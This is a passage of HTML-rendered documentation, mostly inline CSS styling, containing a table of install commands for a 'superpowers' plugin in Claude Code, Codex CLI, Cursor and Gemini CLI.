--tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">Claude Code</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><code style="font-family: Menlo, Monaco, Consolas, "Courier New", monospace; color: rgb(0, 0, 0); background-color: rgb(240, 240, 240); padding: 0.2em 0px; border-radius: 3px; --tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-size: 0.85em;">/plugin install superpowers@claude-plugins-official</code></td></tr><tr data-source-line="73" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">Codex CLI</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><code style="font-family: Menlo, Monaco, Consolas, "Courier New", monospace; color: rgb(0, 0, 0); background-color: rgb(240, 240, 240); padding: 0.2em 0px; border-radius: 3px; --tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-size: 0.85em;">/plugins</code><span> </span>→ search "superpowers" → Install</td></tr><tr data-source-line="74" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">Cursor</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><code style="font-family: Menlo, Monaco, Consolas, "Courier New", monospace; color: rgb(0, 0, 0); background-color: rgb(240, 240, 240); padding: 0.2em 0px; border-radius: 3px; --tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-size: 0.85em;">/add-plugin superpowers</code></td></tr><tr data-source-line="75" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">Gemini CLI</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><code style="font-family: Menlo, Monaco, Consolas, "Courier New", monospace; color: rgb(0, 0, 0); background-color: rgb(240, 240, 240); padding: 0.2em 0px; border-radius: 3px; --tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-size: 0.85em;">gemini extensions install https://github.com/obra/superpowers</code></td></tr><tr data-source-line="76" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; 